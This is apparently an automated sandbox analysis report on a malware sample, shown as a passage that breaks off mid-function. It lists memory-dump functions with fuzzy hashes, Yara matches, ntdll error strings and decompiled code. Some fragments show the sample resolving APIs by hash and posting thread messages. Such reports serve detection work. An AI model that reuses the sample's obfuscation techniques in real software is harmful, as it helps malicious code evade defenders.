LdrInitializeThunk.NTDLL ref: 018A984A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e7a64e927fb5520f40fd89ad305349b805e5826f7067b5c3216c0176894436c
Instruction ID: 5a47f9cb044e60c1aca02654da8f9b9da4426b7a09d62d262c54d440b383f551
Opcode Fuzzy Hash: 5e7a64e927fb5520f40fd89ad305349b805e5826f7067b5c3216c0176894436c
Instruction Fuzzy Hash: 55900261242041635585B19944545474006F7E0385791C122A2508A70CC566A95AE661

Uniqueness

Uniqueness Score: -1.00%

Function 018A9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A986A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b29d384a32585741d6738b6cbc878baca1a929ae63e2db5fb0dddc8908595f1
Instruction ID: c88b25a931c2b815dd07d445aba07cbd344ce50ae5af987d2bd426791e2362f9
Opcode Fuzzy Hash: 5b29d384a32585741d6738b6cbc878baca1a929ae63e2db5fb0dddc8908595f1
Instruction Fuzzy Hash: 2790027120100423D151619945547470009E7D0385F91C522A1518678DD6969A56B161

Uniqueness

Uniqueness Score: -1.00%

Function 018A9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A9A0A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2dbddb06fd632bf857aa174052a133e4b314df82d838695a4461f2f878c2ace
Instruction ID: d2806593074178f53cc6412f9306b404feb27101df0d506d8fefe7fa030b1c06
Opcode Fuzzy Hash: f2dbddb06fd632bf857aa174052a133e4b314df82d838695a4461f2f878c2ace
Instruction Fuzzy Hash: C390027120140413D1406199486474B0005E7D0346F51C121A2258675DC665995575B1

Uniqueness

Uniqueness Score: -1.00%

Function 018A9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A9A2A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a5870aed4d3057a49a0098a40446a7cfbb868270bb8a4d9446941e4369829543
Instruction ID: 4624bca2069c0ec68e538fccbfdb4fe85715ef84de9602b25bf44a218e2c7c5d
Opcode Fuzzy Hash: a5870aed4d3057a49a0098a40446a7cfbb868270bb8a4d9446941e4369829543
Instruction Fuzzy Hash: 0E90026160100053418071A988949464005FBE1355751C231A1A8C670DC599996966A5

Uniqueness

Uniqueness Score: -1.00%

Function 018A9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A9A5A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba573b1a56234053ac88d53a938d4b650f122984b0cc527042c6a4d7d7db56eb
Instruction ID: 3eebff29b3af0f023c23df75e40564c35bc1eaae1695d7e01563ab612514229c
Opcode Fuzzy Hash: ba573b1a56234053ac88d53a938d4b650f122984b0cc527042c6a4d7d7db56eb
Instruction Fuzzy Hash: E390026121180053D24065A94C64B470005E7D0347F51C225A1248674CC95599656561

Uniqueness

Uniqueness Score: -1.00%

Function 018A95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A95DA

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 44dd40b4c6a28faf421c60f5ff0443ad100ea8d6443f7e8c21b37df8203535e7
Instruction ID: 3ea5da1813235bf40c7580ac360cf4cbc5dc0457fedda215b60c13e9cb97bf31
Opcode Fuzzy Hash: 44dd40b4c6a28faf421c60f5ff0443ad100ea8d6443f7e8c21b37df8203535e7
Instruction Fuzzy Hash: 809002A120200013414571994464656400AE7E0345B51C131E21086B0DC56599957165

Uniqueness

Uniqueness Score: -1.00%

Function 018A9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A954A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19b0efc2650dec37a3d2f85dff5a69ff2b4fce73daa08233951dd81f78171b9b
Instruction ID: 29299dfcac29aa4097742638b04bcc364517a910f9f01f1018a43dc1db60c3bf
Opcode Fuzzy Hash: 19b0efc2650dec37a3d2f85dff5a69ff2b4fce73daa08233951dd81f78171b9b
Instruction Fuzzy Hash: 70900265211000130145A59907545470046E7D5395351C131F2109670CD66199656161

Uniqueness

Uniqueness Score: -1.00%

Function 018A9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A978A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cf95e19430e293627cb8d84f4d5606da8917a68a27dc84348ff798fd6a62cff
Instruction ID: dff872398bccccfba207a76b25d9026970ecab4faf1a9eb94bff26b26843e44d
Opcode Fuzzy Hash: 6cf95e19430e293627cb8d84f4d5606da8917a68a27dc84348ff798fd6a62cff
Instruction Fuzzy Hash: 8090026921300013D1C07199545864A0005E7D1346F91D525A1109678CC955996D6361

Uniqueness

Uniqueness Score: -1.00%

Function 018A97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A97AA

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66ae5bce4efa76708f8395541c0e6ee4985f4cc8d725d1e9940850335be38502
Instruction ID: 10b281ed22c46bf616cb560d6d2ecc58434813915b603285557414f9c050e759
Opcode Fuzzy Hash: 66ae5bce4efa76708f8395541c0e6ee4985f4cc8d725d1e9940850335be38502
Instruction Fuzzy Hash: C990026130100013D180719954686464005F7E1345F51D121E1508674CD955995A6262

Uniqueness

Uniqueness Score: -1.00%

Function 018A9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A971A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 399a43378fbe5e07f7ffefd8e1c7aa87748ca22a10651f96b133fc54ceb3a7cc
Instruction ID: cd84beb7554c9e1c40576ae8c410ac660586be425b415cc51bef950274fbb5be
Opcode Fuzzy Hash: 399a43378fbe5e07f7ffefd8e1c7aa87748ca22a10651f96b133fc54ceb3a7cc
Instruction Fuzzy Hash: 2790027120100413D14065D954586860005E7E0345F51D121A6118675EC6A599957171

Uniqueness

Uniqueness Score: -1.00%

Function 018A96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A96EA

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 458f5d96767a53e7ea1942a9ee3a8348478e8759d8ae68fd5ae95f856af3185a
Instruction ID: 09443f3d446aa579babff4040b810e77652961d40106763071f8b4a5c8eff5cc
Opcode Fuzzy Hash: 458f5d96767a53e7ea1942a9ee3a8348478e8759d8ae68fd5ae95f856af3185a
Instruction Fuzzy Hash: 6E90027120108813D1506199845478A0005E7D0345F55C521A5518778DC6D599957161

Uniqueness

Uniqueness Score: -1.00%

Function 018A9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A966A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1a7b479cf78c8b4ead0880cf4221bf90eff6a835feee86b8730a1856bb528fa
Instruction ID: 39321384087a9e2a373aea05b7de92afcb47e4d012fcd715c53c19c01c0b82a7
Opcode Fuzzy Hash: e1a7b479cf78c8b4ead0880cf4221bf90eff6a835feee86b8730a1856bb528fa
Instruction Fuzzy Hash: 2390027120100813D1C07199445468A0005E7D1345F91C125A1119774DCA559B5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 58
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E004082E8(void* __eax, void* __esi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __edi;
				void* _t15;
				int _t16;
				void* _t19;
				void* _t23;
				long _t24;
				int _t30;
				void* _t33;
				void* _t35;
				void* _t40;

				asm("xlatb");
				asm("wait");
				_t40 = __esi - 0x550ce1f6;
				_t33 = _t35;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t15 = E0040ACD0(_t19, _t23, _t40, _a4 + 0x1c,  &_v68); // executed
				_t16 = E00414E20(_a4 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
				_t30 = _t16;
				if(_t30 != 0) {
					_push(_t23);
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t42 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t30(_t24, 0x8003, _t33 + (E0040A460(_t42, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
				}
				return _t16;
			}

0x004082e8
0x004082eb
0x004082ec
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833c
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: bc66a93de982fcc152c2eecad4ca8144d9429f41e232e602208d9272adf07d3c
Instruction ID: fcceadab495225344db43e8cd43de3fac09e5b8ef18c0673687ce972fc43dffa
Opcode Fuzzy Hash: bc66a93de982fcc152c2eecad4ca8144d9429f41e232e602208d9272adf07d3c
Instruction Fuzzy Hash: A301D831A803287BE721A6959C43FFE762CAB40F54F04411AFF04BA1C1E6A8691647EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004082F0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833c
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A062, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041A062(char* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				void* _v117;
				char _t14;
				void* _t23;

				 *__ebx =  *__ebx - 0x6b;
				_t23 = ss;
				0x9331a688();
				_t11 = _a4;
				_t5 = _t11 + 0xc74; // 0xc74
				E0041A960(_t23, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t14;
			}

0x0041a064
0x0041a067
0x0041a06a
0x0041a073
0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9da90def7783d4c25f9e571d53aef5fc9b68f2689c6d2cc3276510882d855227
Instruction ID: 6a412cf5b74168afc74f191587fe8f3ad948a635069b60cf77536eb96efd9734
Opcode Fuzzy Hash: 9da90def7783d4c25f9e571d53aef5fc9b68f2689c6d2cc3276510882d855227
Instruction Fuzzy Hash: E7F0A0B12002046BCB25DF75CC85EEB3BA9EF84360F154799F858AB292C631E851CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E0041A030(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}

0x0041a047
0x0041a04f
0x0041a052
0x0041a056
0x0041a05b
0x0041a05d
0x0041a061

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0b3
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 00419FF8, Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 03e9093b74d1a94712e318f7cb5a534fa851ef372762b9642eb02261604237ed
Instruction ID: 96abbc1245583e557aa17502adab52541910c39ac5ae80e3f600ee443de8581a
Opcode Fuzzy Hash: 03e9093b74d1a94712e318f7cb5a534fa851ef372762b9642eb02261604237ed
Instruction Fuzzy Hash: 54C08C713046218AE224EF64E8408B3B3AAFBC4340320C91BD58646000823244594665

Uniqueness

Uniqueness Score: -1.00%

Function 018A967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A9694

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca883191223df91ba1e7ff52d6bc22926cda686fe9fdd17004159eeb8d82ae9f
Instruction ID: 0371c9277f5762863260abd5c705474c2f31f977e55873e57346959db4ce5f18
Opcode Fuzzy Hash: ca883191223df91ba1e7ff52d6bc22926cda686fe9fdd17004159eeb8d82ae9f
Instruction Fuzzy Hash: C8B02B71C010C0C7E601D3A006087173900BBC0304F13C021D2024350B8338C180F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0191B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

write to, xrefs: 0191B4A6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0191B323
*** Inpage error in %ws:%s, xrefs: 0191B418
This failed because of error %Ix., xrefs: 0191B446
read from, xrefs: 0191B4AD, 0191B4B2
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0191B305
The instruction at %p referenced memory at %p., xrefs: 0191B432
<unknown>, xrefs: 0191B27E, 0191B2D1, 0191B350, 0191B399, 0191B417, 0191B48E
The resource is owned exclusively by thread %p, xrefs: 0191B374
*** An Access Violation occurred in %ws:%s, xrefs: 0191B48F
*** then kb to get the faulting stack, xrefs: 0191B51C
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0191B38F
Go determine why that thread has not released the critical section., xrefs: 0191B3C5
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0191B2F3
*** enter .cxr %p for the context, xrefs: 0191B50D
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0191B314
a NULL pointer, xrefs: 0191B4E0
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0191B39B
*** Resource timeout (%p) in %ws:%s, xrefs: 0191B352
The instruction at %p tried to %s , xrefs: 0191B4B6
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0191B53F
an invalid address, %p, xrefs: 0191B4CF
The critical section is owned by thread %p., xrefs: 0191B3B9
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0191B484
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0191B2DC
*** enter .exr %p for the exception record, xrefs: 0191B4F1
The resource is owned shared by %d threads, xrefs: 0191B37E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0191B3D6
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0191B476
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0191B47D

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: d6202d6f7bbb965b255ad88ccb34a01a6a5ee8e6a780fbd3617d1aac68d1d4c8
Instruction ID: 260dc463764f396743a7d7b884889561c210bac742a493e1a09aa3e3af6f3859
Opcode Fuzzy Hash: d6202d6f7bbb965b255ad88ccb34a01a6a5ee8e6a780fbd3617d1aac68d1d4c8
Instruction Fuzzy Hash: A9812531A40204FFDB216B4A8C85D6B3F7BEF56B52F40404CFE099B256D2699691CBB3

Uniqueness

Uniqueness Score: -1.00%

Function 01921C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01921C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18448a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0186B150();
				} else {
					E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x195589c);
				E0186B150("Heap error detected at %p (heap handle %p)\n",  *0x19558a0);
				_t27 =  *0x1955898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01921E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0186B150();
				} else {
					E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0186B150("Error code: %d - %s\n",  *0x1955898);
				_t113 =  *0x19558a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0186B150();
					} else {
						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0186B150("Parameter1: %p\n",  *0x19558a4);
				}
				_t115 =  *0x19558a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0186B150();
					} else {
						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0186B150("Parameter2: %p\n",  *0x19558a8);
				}
				_t117 =  *0x19558ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0186B150();
					} else {
